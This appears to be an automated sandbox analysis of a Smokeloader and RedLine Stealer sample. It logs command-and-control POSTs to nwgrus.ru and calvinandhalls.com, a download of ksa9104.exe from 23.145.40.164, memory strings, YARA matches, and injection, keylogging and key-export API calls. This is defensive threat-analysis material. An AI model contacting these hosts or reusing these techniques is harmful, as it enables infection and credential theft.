                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jjfnbkmpvhxjsu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 269 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://btusdqnvtphf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://utinkaubisghnyye.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 154 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jkjogobunqlid.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 114 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ohoqxgflpcpf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 297 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rcdwkbgyoixtxr.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 261 | Host: nwgrus.ru
                Source: unknown | TCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: 23.145.40.164
                Source: global traffic | DNS traffic detected: DNS query: nwgrus.ru
                Source: global traffic | DNS traffic detected: DNS query: calvinandhalls.com
                Source: unknown | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://nmesrodehsvre.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 181
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 25 Sep 2024 14:02:20 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    X-Frame-Options: DENY
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: DENY
                    X-Content-Type-Options: nosniff
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Transfer-Encoding: chunked
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found with the same Apache/2.4.52 (Ubuntu) headers as the 14:02:20 response (X-Frame-Options and X-Content-Type-Options each sent twice, Transfer-Encoding: chunked), Date: Wed, 25 Sep 2024 14:02:28 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found with the same Apache/2.4.52 (Ubuntu) headers but Content-Length: 409 in place of chunked encoding, Date: Wed, 25 Sep 2024 14:02:29 GMT and 14:02:36 GMT (two responses)
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found with the same Apache/2.4.52 (Ubuntu) headers but Content-Length: 7 in place of chunked encoding, Date: Wed, 25 Sep 2024 14:03:53, 14:04:14, 14:04:37 and 14:04:59 GMT (four responses)
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Wed, 25 Sep 2024 14:01:30 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Body (raw, non-printable): 04 00 00 00 72 e8 86 ea
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Wed, 25 Sep 2024 14:01:31 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Body (decoded): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: eleven further HTTP/1.1 404 Not Found responses with the same headers (Server: nginx/1.26.0, Content-Type: text/html; charset=utf-8, Connection: close) and a byte-identical body to the 14:01:31 response, Date: Wed, 25 Sep 2024 14:01:33, 14:01:35, 14:01:40, 14:01:41, 14:01:43, 14:01:45, 14:01:46, 14:01:47, 14:01:49, 14:01:51 and 14:01:54 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Wed, 25 Sep 2024 14:01:55 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Body (raw, non-printable, 45 bytes as printed): 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                Source: global traffic | HTTP traffic detected: seven further HTTP/1.1 404 Not Found responses with the same headers (Server: nginx/1.26.0, Content-Type: text/html; charset=utf-8, Connection: close) and a byte-identical body to the 14:01:31 response, Date: Wed, 25 Sep 2024 14:01:58, 14:01:59, 14:02:00, 14:02:03, 14:02:06, 14:02:07 and 14:02:08 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Wed, 25 Sep 2024 14:03:21 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Body (raw, non-printable): 03 00 00 00 72 e8 84
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Wed, 25 Sep 2024 14:03:31 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Body (raw, non-printable): 03 00 00 00 72 e8 84
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:03:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:04:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:04:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:04:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2126713671.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125996604.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2126747794.0000000008890000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2129926685.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2129326664.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2127227127.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2125128556.0000000007637000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2124263465.00000000035FA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 00000009.00000002.2999912401.00000000035D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/earch.phpX
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2947253493.00000000004F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4536695596.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4536019543.0000000001119000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4537067944.0000000003207000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4535707850.00000000007D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/search.phpI
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2947253493.00000000004F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4536695596.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4536019543.0000000001119000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4537067944.0000000003207000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4535707850.00000000007D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com/search.phpx
Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://calvinandhalls.com:443/search.phpge
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2129326664.000000000C460000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comon
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
Source: Yara match | File source: 6.2.E647.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.E647.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.uejbbri.24b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.E647.exe.2610000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.uejbbri.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.uejbbri.24a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_0309162B GetKeyboardState,ToUnicode,16_2_0309162B
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB873220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,8_2_00007FF7CB873220

System Summary

Source: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,4_2_00403277
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,6_2_00403043
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004014C4 LocalAlloc,NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014C4
